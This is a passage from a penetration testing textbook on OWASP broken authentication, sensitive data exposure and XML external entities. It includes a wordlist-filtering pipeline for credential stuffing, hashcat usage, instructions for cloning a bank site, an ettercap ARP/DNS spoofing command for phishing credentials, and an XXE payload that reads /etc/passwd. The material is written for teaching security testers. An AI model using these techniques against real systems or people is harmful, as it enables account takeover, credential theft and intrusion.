Once we have noted all of the interesting pages, the next step is to log out of the application (delete cookies, close browser) and attempt to simply access all of the URIs previously recorded. In the event the function was a POST request, leverage Burp to resend the request via the Repeater feature. The two basic types of requests we want to submit are requests with no credentials (unauthenticated) to try to access sensitive pages/functions, and requests submitted while logged into an unprivileged account to try to access administrative-level functions. An example of this would be trying to access the create account page when not logged in, and then submitting the POST request required to create a new user account when logged in as a regular user. This way, we test if we can access the page as a regular user. Pay special attention to cookies, unique HTTP headers, and hidden form fields when checking for the existence of this authentication bypass flaw, as the application may be doing a poor job of enforcing security protections when certain attributes are set in client-side variables.
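A recorded privileged request can also be replayed from the command line; the endpoint and parameters below are hypothetical, standing in for whatever request Burp captured:

```shell
# replay_unauth: resend a recorded admin-only POST with no session
# cookie attached. A redirect to the login page suggests the control
# works; a 200 completing the action suggests an authentication bypass.
replay_unauth() {
  url="$1"; body="$2"
  curl -s -o /dev/null -w '%{http_code}' --data "$body" "$url"
}
# Example: replay_unauth https://target.example/admin/addUser 'username=pentest&role=admin'
```

Repeating the same request with a regular (nonadministrative) user's cookie, via curl's `-b` flag, covers the second case described above.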
The key to successfully attacking an application as it pertains to broken authentication is knowing or learning which defenses are employed and how to bypass them if they exist. Couple this with using the convenience/usability of the application against itself.
Typical defenses for credential stuffing are account lockouts or two-factor authentication. Most applications either don't support two-factor authentication or users choose not to use it due to the inconvenience of this option. Another defense to thwart, or at least notice, an automated attack such as username harvesting or a dictionary attack is logging and alerting; a whole chapter is dedicated to this, but for now know that, as with two-factor authentication, most applications do not implement this control either. We as attackers need to identify which controls are in place in order to tune our attacks to bypass them; for example, noticing how many failed login events it takes to trigger an account lockout and determining how long the account will remain locked out before automatically being reset. This can be identified by locking out a legitimate account and tracking how many failed logins were required to trigger this condition in a given timeframe.

Examples: Logging in via the administrator account shows navigational links the administrator has access to, which a nonadministrative account does not show in its UI, as seen in Figure 3.8.

Figure 3.8 Browser view of basic web interface.


Looking at the address bar in the browser, we can see the various URIs accessed as an administrator. With this information we can now attempt to browse to each location manually after we log out, as noted in Figures 3.9 and 3.10.

Figure 3.9 Browser's address bar showing name of page.

Figure 3.10 Browser's address bar showing name of another page.


Using Burp (as shown in Figure 3.11) to view the POST requests submitted via the administrator account, we can see the specific requests made. Subsequently, we can try to submit the same request as an unauthenticated user or as a regular user lacking administrative rights.

Figure 3.11 POST request as seen from within Burp.


Viewing the password policy (indicated in Figure 3.12) allows us to create a crafted wordlist to use for credential stuffing.

Figure 3.12 The password policy for user accounts of a given web application.

This can be accomplished by starting with a list of passwords (such as from /usr/share/wordlists/rockyou.txt.gz in Kali) and using bash to filter out only the conforming passwords from the 14 million+ passwords in the file. A command to output all 8+ character words can be seen in Figure 3.13.

Figure 3.13 Grepping for 8 or more characters.


A command to output all 8+ character words with at least one number (building off of the last command by using its output) is shown in Figure 3.14.

Figure 3.14 Grepping filtered results for strings with at least one number.

A command to output all 8+ character words with at least one number and
at least one special character is shown in Figure 3.15.

Figure 3.15 Grepping filtered results to match strings with special characters.

These efforts took the initial input of over 14 million passwords and pared them down to just over 450,000 passwords that all meet the password complexity requirements of the target web application. Taking this approach results in a wordlist which has been tuned to yield the best results.
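The filtering shown in Figures 3.13 through 3.15 can be reproduced with a pipeline along these lines, demonstrated here on a small inline sample rather than the full rockyou list:

```shell
# Filter a wordlist down to candidates matching a policy of 8+
# characters, at least one digit, and at least one special character.
cat > sample_words.txt <<'EOF'
password
Summer2019!
short1!
trustno1
P@ssw0rd
EOF
grep -E '^.{8,}$' sample_words.txt |
  grep -E '[0-9]' |
  grep -E '[^A-Za-z0-9]' > tuned_words.txt
cat tuned_words.txt   # only Summer2019! and P@ssw0rd survive
```

Swapping sample_words.txt for the decompressed rockyou.txt yields the tuned list described above; add a `grep -E '[A-Z]'` stage if the policy also requires an uppercase letter.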

Link to hands-on portion: https://tptgtwa.com/owasp2


Root Cause and Conclusion: Broken authentication applies to a multitude of mistakes developers can make when implementing an authentication process for a web application. It is challenging to produce an interface which is both convenient for users and will be widely adopted by a large and diversified user base; some applications block known weak passwords while others institute a password strength meter. It is also becoming more common to offer two-factor authentication, but user adoption is typically low in this realm. In the world of information security, users are typically a weak link, and the application developer can't secure the account alone. It takes users choosing strong passwords, not reusing those passwords, and enabling two-factor authentication, coupled with proper HTTP security headers, proper hashing and salting in the database, and proper implementation of security controls at the application layer, to adequately address this flaw. The security of user accounts is a shared responsibility, and because of this, we can often attack the application to target users and compromise accounts via the deficiencies and attacks discussed in this chapter.
Chapter 4

OWASP A3:2017 Sensitive Data Exposure
Definition: Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.

Details: The exposure of sensitive data comes in several forms and typically stems from an application owner failing to properly protect data at rest (in the database) or in transit. We as attackers can take advantage of this flaw once we identify it. The scope of this flaw covers weaknesses in client-side security as well as server-side security, as both endpoints have to be configured correctly to effectively reduce the likelihood of this type of attack causing harm. Sensitive data essentially equates to anything that should be kept private, could be used to compromise the session, could cause a breach, or is otherwise a prime target for an attacker. Such data would be the session token, credit card information, credentials, keys, or financial records. To gain access to these resources we can rely upon other OWASP top ten vulnerabilities, such as Injection, Cross-Site Scripting, XML External Entities, and others, to provide the initial point of access. There are, however, somewhat passive ways we can identify where to look to find likely paths to the exposure of sensitive information. HTTP headers are a smart place to look, specifically paying attention to how the application tells the browser to cache resources and checking to see if the HTTP Strict Transport Security (HSTS) header has been set. HSTS is a means by which an application can force browsers to communicate with the application over an encrypted connection. When this header is not in place and both HTTP and HTTPS connections are available for a web server (even if a redirect from HTTP to HTTPS exists), we as an attacker may be able to compromise the connection and expose sensitive information. In addition, browsers will cache pages even over HTTPS depending on how the web server is configured, which means that on the client side there may be an exposure of sensitive information that can be subsequently compromised.
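When HSTS is deployed, the server includes a header along these lines in its HTTPS responses (the one-year max-age shown is a common choice, not a requirement):

```
Strict-Transport-Security: max-age=31536000; includeSubDomains
```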
There are other times when an application may be configured to store sensitive information in a hashed form in the database, such as users' passwords, but when the wrong hashing algorithm is in use, this too can lead to predictable results. A famous case study is the repeated Yahoo! breaches, in which it was made public knowledge that the multibillion-dollar company was hashing users' passwords with an algorithm inappropriate for this task: MD5. In this case the password hashes were compromised, and subsequently many were cracked with ease. An application's exposure of sensitive data can stem from insecure settings, a lack of proper configuration, and the like. We as an attacker can take advantage of this by looking for a lack of encryption or weak cipher suites, case insensitivity with password inputs, or otherwise weak hashing algorithms and cacheable sensitive information.

Real-World Dialog: During a penetration test of a client's environment, I discovered the web server was listening on port 80 (HTTP) and port 443 (HTTPS) and was missing a multitude of HTTP security headers, which is very common; among the missing headers was the HTTP Strict Transport Security (HSTS) header. The missing HSTS header coupled with the server listening on port 80 meant that even though an HTTPS redirect would occur as a response to the initial HTTP request (301 redirect to https://), if I could get between the client and the server, I could effectively launch a TLS downgrade attack from my man-in-the-middle (MITM) position and redirect the client to a fraudulent website. To effectively launch this attack I needed to be (essentially) on the same subnet as the victim, and the corporate WiFi network was the perfect location per the rules of engagement, as I was on-site for other testing which was running concurrently. An ARP spoofing attack resulted in some client machines thinking my computer was a legitimate source for DNS responses. This masquerade was leveraged to ensure the victim attempting to access the intended web application was instead communicating with my machine over HTTP. The HTTPS redirect never happened, the browser never knew to connect over HTTPS to verify the authenticity of the web server, and subsequently, when my fake website presented the user with input boxes requesting credentials, the victim happily provided them. I, in turn, was able to redirect the user to the real website to avoid suspicion while using the credentials myself to gain access to their account.

How to Exploit: The category of sensitive data exposure is just that, a category, and therefore lends itself to exploitation via multiple paths. As an attacker we want to look for the aforementioned weaknesses and capitalize on them to expose the sensitive information, whatever it may be.

Examples: The first example exploit to divulge sensitive information is to take advantage of improper caching settings. Like HSTS, caching is typically controlled via HTTP headers, and identifying a poor configuration is as simple as inspecting the headers sent from the server to our browser. Specifically, caching is a means by which a web server can save information on the client side (browser) to greatly increase speed when serving content. Typically, images, CSS, JavaScript, and entire pages of HTML are requested once, cached, and served from cache (if they haven't changed since the last time they were requested) to subsequently load a web page in a fraction of a second, as opposed to transmitting all of the content repeatedly. The risk arises when sensitive information is cached by the browser, such as PCI data, form data, and other content not meant to be saved to a user's hard drive. Usually, the following headers are set to ensure content sent over HTTPS connections is not cached:
Cache-Control: private, no-cache, no-store, max-age=0, no-transform
Pragma: no-cache
Expires: 0
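Inspecting these headers for a given page is a one-liner; the helper below is a sketch with a hypothetical URL, and simply greps the response headers for the caching and HSTS directives discussed in this chapter:

```shell
# check_headers: print only the cache-related and HSTS response headers
# for a URL, so gaps (e.g. no Cache-Control on a sensitive page) stand out.
check_headers() {
  curl -sI "$1" | grep -iE '^(cache-control|pragma|expires|strict-transport-security):'
}
# Example: check_headers https://target.example/account
```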
Astute readers will note the redundancy, which is sometimes necessary when trying to communicate an unambiguous request to the browser (as well as intermediary proxy servers) to not cache the content. Gaining access to cached sensitive content would in most cases require access to the victim's computer (such as in a shared computing scenario) or access to the proxy server in the event sensitive content is being cached at that hop. An effective way to view cached content is by using the same browser previously used to perform the sensitive transaction(s) and navigating to the history to search for the page(s) of interest. Once loaded, click the back button in the browser to see what was previously entered in the input boxes or in the address bar via a GET request. Note that each browser handles history, cached content, and saved form data differently; thus this method may not directly divulge sensitive information, but sometimes it can, as seen in Figure 4.1.

Figure 4.1 Cached browser contents.

In a Windows environment, another way to view cached content is to use a tool called IECacheView, which will work with Windows 10 and Edge. This tool makes use of the cached files located in this directory and its subdirectories:
\Users\%\AppData\Local\Packages\Microsoft\.MicrosoftEdge_8w..we\AC
We can use this tool to get an HTML report (shown in Figure 4.2) of all the cached content and search for leakage of sensitive information.

Figure 4.2 Output from the IECacheView tool.

Alternatively, Firefox cached content on a Linux system is located at:
/home/%/.cache/mozilla/firefox/nfg.../cache2/entries
The files in this directory don't show an extension, but are gzipped and can be decompressed and viewed with a command such as:
gunzip -dfc nameoffile | less
Sensitive data exposure can result in the output of user credential databases
which is very often the topic of publicly disclosed breaches. When we get a
dump of credentials, either directly using an injection aw for example, or
indirectly during reconnaissance on the target web application/business, we
need to be able to crack the hashes to gain access to the original creden-
tials. To do so we can use various tools to help, such as hashcat, John the
Ripper, and RainbowCrack. What we want to pay special attention to is the
format of the hash and whether or not salting was used. If we were able to
expose hashed user credentials it will be incumbent upon us to learn what the
hashing algorithm was as well as the unique salts and rounds for each user account. Specifically, depending on the hashing algorithm and implementation within the application, user passwords may be hashed multiple times/rounds (to increase the attacker's difficulty/cost in cracking them when exposed) and
if securely coded will also have a unique salt for each password to ensure the
same password for multiple users will not result in the same password hash. If
we come across a credential dump via another means, the same logic follows
in the event the passwords are hashed. An internet search for:
site:pastebin.com password hashes
will likely yield useful results, especially when augmented with a specific
known user account (possibly) or public company to associate with the com-
promised data.
On the command line, password cracking tools typically take several arguments, such as the input file comprised of the hashes we want to crack (in the correct format), the type of cracking we want to perform (dictionary based, brute force, etc.), perhaps an output file, and the type of hashes to be cracked. For example, to successfully use the hashcat tool we will first download and compile it, as this helps to ensure any special hardware at our disposal is leveraged in our build:
git clone https://github.com/hashcat/hashcat.git
cd hashcat && git submodule update --init
make && sudo make install
If successful, this should result in a binary/executable version of hashcat
we can now run with this command and arguments:
hashcat -m 0 -o Cracked MD5Hashes rockyou.txt

• -m 0: Specifies the type of hashes we will crack (MD5)
• MD5Hashes: The input file containing the hashes to crack
• rockyou.txt: The wordlist to hash and compare to the input
• -o Cracked: The output file where the cracked hashes are saved

The hashcat tool does have specific hardware requirements and is also installed by default in Kali Linux. There are other options for tools, such as John the Ripper, which is invoked in much the same way as hashcat. We can see in Figure 4.3 and Figure 4.4 the hashes and invocation of the tool, respectively.

Figure 4.3 Viewing a list of hashes in MD5 format.



Figure 4.4 Invoking John The Ripper to crack hashes.


Cracking hashes is a common occurrence throughout the course of penetra-
tion testing. At times we exploit vulnerabilities to access MySQL hashes, bcrypt hashes, MD5 hashes, NTLM hashes, and others, which can all be cracked using the tools previously discussed as long as we provide the correct input format and the correct command line arguments for the tools.
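Conceptually, the dictionary attack these crackers all perform reduces to hashing each candidate word and comparing it against the target. A minimal sketch of what hashcat's -m 0 (unsalted MD5) mode does under the hood; the wordlist here is an illustrative stand-in for rockyou.txt:

```python
import hashlib

def dictionary_crack(target_hash, wordlist):
    """Hash each candidate word and compare it to the target hash."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hash:
            return word
    return None  # no candidate matched

# MD5 of 'password1', a typical rockyou.txt entry.
target = hashlib.md5(b"password1").hexdigest()
print(dictionary_crack(target, ["letmein", "password1", "qwerty"]))  # → password1
```

This also shows why per-user salts matter: with a unique salt, the attacker must redo the entire wordlist of hash computations for every user rather than once for the whole dump.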
The final attack we will explore, as it pertains to sensitive data exposure,
is session compromise due to the lack of HSTS. As previously mentioned,
HSTS is used to ensure only HTTPS connections are established even when
a user action results in an initial HTTP request to the web application. By
typing www.example.com into the address bar in our browser and executing
this request, by default our browser will make a connection to the HTTP
version of the website if HSTS is not configured for the example domain. If there is an HTTPS redirect, such as a 301 response code pointing our browser
from the HTTP port to the HTTPS port, our browser will follow that and
we will end up on the HTTPS site with an authentic and encrypted HTTPS
session...unless a malicious attacker prevents the 301 redirect from occurring.
To execute this type of attack it is usually necessary to be on the same network as the victim user, such as the same LAN in the office or the same Wi-Fi network in a public location. We want to be on the same network so we can manipulate the victim's traffic and ultimately route their traffic through our device in order to launch additional attacks. The objective of this attack is to take advantage of the lack of HSTS on a website to trick a victim user into browsing to a malicious website or otherwise submitting their credentials in plain text to us. To successfully execute this attack, we need to first poison layer two traffic, specifically the Address Resolution Protocol (ARP) traffic, via an ARP poisoning attack. We can also poison layer seven DNS requests to achieve the same goal, which is to trick others on the same network into communicating directly with our machine instead of the legitimate, originally intended machine. A tool to help with this is ettercap. Ettercap (ethernet capture) supports DNS spoofing, MiTM attacks, and active connection manipulation as well as passive reconnaissance. Similar to many of the other
tools discussed so far, it too is installed by default in Kali Linux. Let's explore a DNS spoofing attack to trick a victim into browsing to a fake/spoofed


web application. To begin this attack, we first need to have our victim machine (or target network) identified, as well as the target website we want to
spoof. A great way to copy the client-side components of a website (HTML,
CSS, scripts and images) is to use Firefox to browse to the legitimate web-
site and choose File -> Save As to save the contents of the website to our
computer as we can see in Figure 4.5.

Figure 4.5 Using our browser to save the client-side components of a website.

From here we can simply copy the resulting files (a home page and a folder containing the content) to our own web server's home directory and start Apache to serve the spoofed copy. The examples below convey how to accomplish this; the results can be seen in Figure 4.6. Some modifications to the HTML and local content references may be necessary to make sure images show up properly and links work as expected.
# cp -r Downloads/Bank\ Website* /var/www/html
# cd /var/www/html
# cp Bank\ Website.html index.html
# service apache2 start
# firefox 127.0.0.1

Figure 4.6 View of our copied banking website being served locally.
Once we are satisfied with the copied website, we can now focus our attention on ettercap to launch the DNS poisoning attack. Before starting ettercap we need to modify its DNS configuration file, /etc/etter.dns. The file is well commented; what we need to do is place our target domain on a new line defining our attack server's IP address, which should be the same host on which we are running our Apache web server. For this example, our target/victim's host is 10.8.40.6, our attack machine (running Apache) is 10.8.40.4, and the website we are going to impersonate is bigexamplebank.com. Thus, the resulting etter.dns file would contain a new line like this (with tabs between each field):
bigexamplebank.com A 10.8.40.4
With the DNS configuration complete we can now run the ettercap tool
with this command:
ettercap -T -i eth0 -M ARP -w output -P dns_spoof /10.8.40.6///
• -T: Specifies to stay in text mode
• -i eth0: Specifies our network interface
• -M ARP: Specifies to launch an ARP poisoning attack
• -w output: Chooses the file to write output to
• -P dns_spoof: Selects the DNS spoofing plugin
• /10.8.40.6///: Specifies the single target (the victim machine)
Once we execute this command we can monitor the network traffic on the victim machine with wireshark or tcpdump to see all of the gratuitous ARP traffic. Ultimately, when we, acting as the victim, use the machine 10.8.40.6 to browse to bigexamplebank.com, we are directed to the attack machine at 10.8.40.4, where our Apache web server serves the spoofed banking page, which we can see in Figure 4.7.

Figure 4.7 Browser view of spoofed website matching legitimate domain name.
At this point a victim would think they are on the legitimate website (unless they paid special attention to the lack of HTTPS in their browser's address bar) and proceed to log in with their credentials. In a different setup, we could choose to route their requests to the legitimate website, essentially acting as a relay server between the victim client and the insecure host/domain (the banking website in this example). In this fashion we can gather credentials and gain access to the legitimate banking website. We could even set up a spoofed 2-factor authentication prompt and relay that to the legitimate website to gain access to the victim's account.

Link to hands-on portion: https://tptgtwa.com/owasp3


Root Cause and Conclusion: The ARP and DNS protocols don't have
built-in authentication/security to prevent the above scenario from working,

although there are other ways to secure a network and effectively thwart a spoofing and poisoning attack. In this chapter we discussed how Sensitive Data Exposure can manifest itself, and how we as attackers can use several tools to help exploit poorly configured websites. Inadequate caching control, leaked credentials, and missing security headers are all scenarios web application penetration testers will come across in time. Interestingly, the entire last example, ARP poisoning and DNS spoofing, would have been much less likely to dupe a victim into divulging credentials if only the HSTS header were set for bigexamplebank.com. In fact, just because we spoofed the DNS record for a banking website doesn't mean we can bypass the HSTS preload built into the browser. The mere existence of this header would have resulted in a browser warning regarding the untrustworthy SSL certificate. Note that as of 2019, Gmail still does not have the HSTS header set. Cryptography works in most cases when configured properly: bcrypt and scrypt hashes take significantly more time to crack compared to MD5, whereas enforcing TLS connections forces attackers to try harder to compromise connections. The exposure of sensitive data comes in many forms; as attackers it benefits us to be familiar with various web application vulnerabilities and useful tools to help with exploitation.
Chapter 5

OWASP A4:2017 XML External Entities (XXE)
Definition: Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.

Details: As with other OWASP top ten vulnerabilities, XXE is an attack that
takes into account several elements, such as a webserver hosting a vulnerable
application, a poorly configured XML processor, an attacker, and the ability
to submit input which will be processed by the vulnerable XML processor.
Let's discuss these components and the intricacies of XXE in more detail.
XML (Extensible Markup Language) is a markup language (like HTML)
commonly used on the web to facilitate the storage and transportation of
data. XML is self-descriptive and comprised of user-defined tags, as opposed to HTML, which has a limited number of predefined tags developers can
utilize. Figure 5.1 shows an example of XML. Note the arbitrary names of
the tags and the equally arbitrary values defined within each tag; the first
line in this example is called the prolog.
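A document of the kind shown in Figure 5.1 might look like the following sketch (the tag names and values are arbitrary, illustrative choices, which is exactly the point of XML):

```xml
<?xml version="1.0" encoding="UTF-8"?>  <!-- this first line is the prolog -->
<employee>
  <name>Jane Doe</name>
  <role>Analyst</role>
</employee>
```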


Figure 5.1 Basic XML example.

An XML processor is software which is designed to read input, such as the


XML in the image above, and convert it into an XML DOM object or other
representation specific to the processor via a process called parsing. XML processors can confirm the XML input is valid (we call this a validating XML processor) or not (a nonvalidating XML processor), and this processing software is commonly written in Java, JavaScript, Perl, or Python, but not commonly custom written for each application; the importance of this will become evident later in this chapter. The complexity of an XML document can be significant, and therefore there are times when it is useful to define the various attributes, structures, notations, elements, and entities of an XML document. This is accomplished with a Document Type Definition (DTD). An entity, as it pertains to XML, is essentially a placeholder. We can declare an entity in the XML document's prolog or in the DTD, and the entity can be local or external from the perspective of the XML document. An example of how a legitimate (nonmalicious) internal entity would be used is depicted in Figure 5.2:

Figure 5.2 XML internal entity.
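An internal entity declaration of the kind depicted in Figure 5.2 might read as follows (the author name and tag names here are illustrative, not taken from the figure):

```xml
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE book [
  <!ENTITY author "Jane Doe">  <!-- internal entity declared in the local DTD -->
]>
<book>
  <writtenBy>&author;</writtenBy>
  <reviewedBy>&author;</reviewedBy>
</book>
```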

Note this internal entity has been defined in the local DTD (hence standalone
being set to yes in the prolog) and is merely serving as a placeholder for the
author's name. This is useful when there is a need to repeatedly reference the
author without wanting to hardcode it. Also note the syntax of the entity as
shown in the author element: The beginning ampersand "&" followed by the
entity name and finally the semicolon. Below is an example of an external
OWASP A4:2017 XML External Entities (XXE) 57

entity reference. The example in Figure 5.3 introduces a few more components
of XML useful to discuss, and which will help us eventually craft an attack
we can understand and appreciate.

Figure 5.3 XML external entity.

In this example the SYSTEM keyword denotes the entity is private (the concept being this entity would be reserved for perhaps a single author of the document), contrasted with the PUBLIC keyword. The reference to the evilsite.info URI denotes the location where the entity can be found (and would subsequently be incorporated into the document), and since this is no longer local, standalone is set to no in the prolog. For thoroughness, PCDATA refers to Parsed Character Data, which will be parsed by the parser, as opposed to CDATA (Character Data), which will not be parsed; tags inside CDATA will not be treated as markup and entities inside of CDATA will not be expanded. With this knowledge, a possible attack would be to replace the reference to the URI with that of a file from the vulnerable application's local filesystem. This would in turn tell the parser to replace the reference to the entity with the file and subsequently display its output as shown in Figure 5.4.
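A payload of the general shape just described, with the entity's URI pointed at a local file, might look like this sketch (the element names are illustrative assumptions):

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">  <!-- entity now resolves to a local file -->
]>
<data>&xxe;</data>
```

When the parser expands &xxe;, the contents of /etc/passwd are substituted into the document and reflected back to us.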

Figure 5.4 Output of successful attack showing /etc/passwd results.

This example shows that we as an attacker can submit crafted input to exploit the vulnerable parser. Specifically, the input we provide will be used to reference files on the impacted OS. This works by declaring entities in our attack input; these entities are then read by the XML parser and subsequently expanded, performing a type of text replace function. In the event we can control the input which will be sent to the XML processor, we have the opportunity to put in whatever arbitrary values we want and have them handled by the parser. The impact of this attack is typically limited to an information disclosure vulnerability, meaning we can read local files on the OS hosting the vulnerable application. We can also list directories (so basic Unix "ls" and "cat" like functionality), specify the entire path to list, and of course the filename we want to read. We are, however, limited by the permissions on the filesystem in terms of what we can list. For instance, the /etc/passwd file is globally readable so we can see the contents of that file. The /etc/shadow file, however, is not; thus we can list the contents of /etc but can't read the shadow file unless perhaps the vulnerable application's XML parsing component is running as root. This is important to keep in mind; as with other vulnerabilities which provide us with a level of access on the OS, our level of permission is dictated by the permissions of the account under which the vulnerable application is running.
There are a limited number of exploit paths for an XXE attack. The im-
pact of the vulnerability relies on the XML processor primarily as it relates
to its configuration. For instance, remote code execution is typically rare, and depends on the type of XML processor being used and how it has been written. More often, the information disclosure of listing directory contents and reading files is the extent of the flaw. We can typically use this flaw to gain a foothold when we are able to read files which contain sensitive information. Examples of this would be SSH key files, files containing passwords, and even web server source code files which, when resulting in source code disclosure, can also lead us down a path of remote compromise. As this flaw will result in the ability to list directory contents and read files, it behooves us as penetration testers to have a comfortable, deep understanding of filesystem structures and locations of interesting files. XXE, as with other application layer vulnerabilities, impacts the application oftentimes regardless of the underlying operating system; thus in the case of XXE the OS may be running Windows, Linux, or BSD. Knowing the structure of the filesystem associated with the OS will help us craft more potent and fruitful attacks.
Processing XML is not an overly complex task and can in fact be accom-
plished with only a few lines of code when leveraging suitable libraries to
assist in the process. For instance, the XMLHttpRequest object has an XML
parser built in and can be leveraged in our browser to handle this. Conversely,
in many situations processing and parsing XML documents can be a cum-
bersome task best suited for dedicated programs purpose-built for the job. It
is this latter fact which lends itself to error-prone consequences, meaning that
oftentimes a commercially available (or open-source) processor is vulnerable,
and the business/application relying on this software is at risk of compro-
mise. Commonly a business is accustomed to purchasing software to provide
a solution (like HR and payroll benefits) and is not responsible for updating
or maintaining the code. Likewise, the consumer of a commercial product is
generally ill-equipped to perform any type of security testing/scanning of the
commercial software they purchase. Due to this, it is not uncommon for at-
tackers to be the first to discover an XXE flaw in externally available systems
supporting end user XML input.

Real-World Dialog: During a recent external network penetration test I


came across several systems that exposed a web interface, which is quite commonplace. Because the nature of the penetration test was network-focused, and because I have it at my disposal, I used Nessus to perform a scan of the external network, and the results of this scan identified an XXE vulnerability on several hosts. The output of the Nessus scan results showed the
URI to target, the vulnerable parameters, and actually provided a successful
attack string to exploit the flaw. So, at this point the identification of the flaw was confirmed and I even had the code required to exploit it. My next step was to take the attack code (which was basically just an HTTP POST request) and utilize Burp to first confirm that I could reproduce the finding (Nessus did show the results of the /etc/passwd file, so I had a high level of confidence the finding was legitimate) using my own tools, since reproducing the flaw ensures there is not a false positive; of equal importance, this enables me to tweak the POST request to meet my needs. Burp's Repeater tool is a great choice to use when there is a need to modify HTTP requests, submit them, review the results of the request, and continue to modify until the request is perfect. Using Repeater, I was not only able to reproduce the original request and confirm the flaw but also specify other files and folders to view. The successful exploit can be seen in Figure 5.5.

Figure 5.5 POST request showing successful XXE attack.

At this point I was able to view local directory listings on the OS hosting the vulnerable application (local from the perspective of the OS, but remote from my perspective) and was able to read files which I had permission to read. I had access to navigate the entire filesystem and wrote a custom script to aid in automatically parsing file contents. This was implemented in bash and leveraged wget to make the POST request followed by parsing the contents of the results file. The challenging part of the script was writing the logic to determine whether the results were the contents of a file or a directory listing, as it was not always evident from the results of the POST request without manual review. After running the script, I reviewed the resulting files which had been downloaded and grepped through them for keywords such as password and key. Within several user directories were improperly configured SSH keys which I was able to read. From there, gaining SSH access to the vulnerable systems was trivial. The XXE vulnerability resulted in the compromise of several hosts and served as the initial vulnerability that led to the eventual compromise of the entire environment.

How to Exploit: The first component of successful exploitation centers on correct identification of the XXE vulnerability. The example provided earlier made use of Nessus for the initial identification of the flaw followed by manual validation and exploitation. What we want to look for when manually trying to identify XXE vulnerabilities is the existence of XML parsing. This can be in the form of an API endpoint, a file upload, an HTTP parameter, and other attack surface already covered in this book. Without prior knowledge of the application, we need to rely on our previous reconnaissance/mapping to conceptualize logical points of entry and subsequently craft a suitable attack. Depending on the potentially vulnerable component of the application, our attack will look different; for example, if the XML parser is invoked when reading user-provided files, then logically we would need to format a file to house the XXE attack. Likewise, an API's required request parameters/headers will need to be satisfied just like the POST payload; all these things will need to be crafted in such a way as to not cause an error during our transmission of the request. We'll cover examples of how to do this momentarily, but first let's focus on the identification of the vulnerability.
One way to identify an XXE weakness is to leverage previously discussed
techniques to fuzz various application inputs and examine the responses from
the application. We are looking for errors indicative of a poorly configured XML processor and we are sending payloads consisting of strings likely to induce those errors. Specifically, strings such as single quotes and double quotes (used for quoting values), brackets (used for CDATA section delimiters), ampersands "&", comments "<!-- -->", and opening/closing brackets < and >, all of which could interfere with normal processing of an XML document.
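These probe strings can be kept as a simple list to feed whatever fuzzer or proxy is in use. The exact set below is an illustrative assumption rather than an exhaustive catalog:

```python
# XML metacharacter probes likely to upset a poorly configured parser.
xml_fuzz_strings = [
    "'", '"',         # quote characters used for attribute values
    "[", "]", "]]>",  # CDATA section delimiters
    "&", ";",         # entity reference syntax
    "<!--", "-->",    # comment delimiters
    "<", ">",         # tag delimiters
]
```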
The expected results from a vulnerable XML parser will vary depending on
several factors, such as the software in use, the defined error messages, and exception handling at the application layer or WAF. To help automate this identification phase we can leverage the fuzzing feature of ZAP and will execute our attack on the profile/quote input on the vulnerable HR management system depicted in Figure 5.6.

Figure 5.6 Web interface showing user quote.

The form's text box allows us to submit input to the application which will
in turn be handled by an XML processor. The resulting text, if valid, will
be used to update our "user quote". After enabling ZAP and configuring our browser to leverage the proxy, we first prime ZAP with the applicable POST
request. The next step is to fuzz the input with each of the attack strings
mentioned a moment ago and then launch the attack in order to try and
invoke an error. In reality, if we are only submitting a dozen or so strings then
manually submitting these via our browser is oftentimes sufficient, as opposed to using another tool; there is no value in adding unnecessary complexity. If
our attack strings don't cause an error, we would expect the user quote to
be updated with the text we submit and consequently shown on the profile
page of the application when accessed by our browser. If the input causes an
error, we should expect the quote to not be updated and an error message to
be displayed in our browser (or the proxy's/fuzzer's HTTP results). Figure
5.7 shows the POST request we want to fuzz as well as ZAP's UI presenting
us with the option to do just that.

Figure 5.7 Invoking ZAP's fuzzer.

Focusing on the response size (the size, in bytes, of the HTTP response
from the server) we can see there is an evident difference for several of the
submitted inputs per Figure 5.8.
Figure 5.8 Fuzzing results.

ZAP is doing what we told it to do: launching the fuzzing attack. This tool
however is not going to have the context in this instance to understand the
attack we launched or the impact/relevance of the strings submitted and
subsequent results from the application. The point is, it is incumbent upon
us as the attacker to understand what we are doing and wield our tools
accordingly. Even using the built-in scanning feature of ZAP failed to identify
the XXE vulnerability on this page, as seen in Figure 5.9.
Figure 5.9 ZAP alerts showing some findings but not XXE.

Specifically, as it pertains to the output of Figure 5.10, we can see on the far right of the bottom portion of ZAP's output the parameters submitted using the fuzzer, starting with < and followed by >, ., <!-- and so on from top to bottom. The highlighted input shows a response size of 3,664 bytes, which is not only different from all of the other response sizes but also the largest.
Figure 5.10 Output of fuzzing showing application error.


Naturally gravitating to this <!-- parameter as one of interest yields the application's response showing a Fatal Error on line 45, meaning the XML processor seems to have taken our input as a literal comment, and in doing so caused an XML error. This, similar to other injection attacks, is our indicator pointing toward a possible vulnerability in the application. This chapter focuses on XXE; therefore this is likely an error indicative of this flaw, but in the real world it is not always obvious and it is wise to use a quality search engine to assist in researching unknown errors. For instance, the first search

result for a query of "error comment not terminated" points to an XML


parsing error so we know we are on the right track.
At this point we have a level of confidence that the application is vulnerable to XXE and have likely identified the injection point. The next step is to invoke
additional error messages, leverage the errors to craft a suitable attack and
proceed to attempt to exploit the target application. Let's focus on some
examples of how to do this.

Examples: Continuing with the HTML form example, let's work to invoke
additional error messages. ZAP's Open/Resend with Request Editor tool (as
well as Burp's Repeater, which is essentially the same thing) will work great
for this. Since we know the POST payload and request to focus on, we can
begin by modifying the payload to include an attack string specific to the
application and input. Submitting the string:
userquote=<!DOCTYPE test [ <!ELEMENT test ANY ><!ENTITY xxe
SYSTEM "file:///etc/passwd" >]><quote>&xxe;</quote>
yields the output of multiple errors, including those below, which are also shown in Figure 5.11:
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 2
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 19
Fatal Error 68: StartTag: invalid element name Line: 4 Column: 39
Fatal Error 76: Opening and ending tag mismatch: quote line 4 and q Line:
5 Column: 6
Fatal Error 76: Opening and ending tag mismatch: q line 3 and uq Line: 6
Column: 6
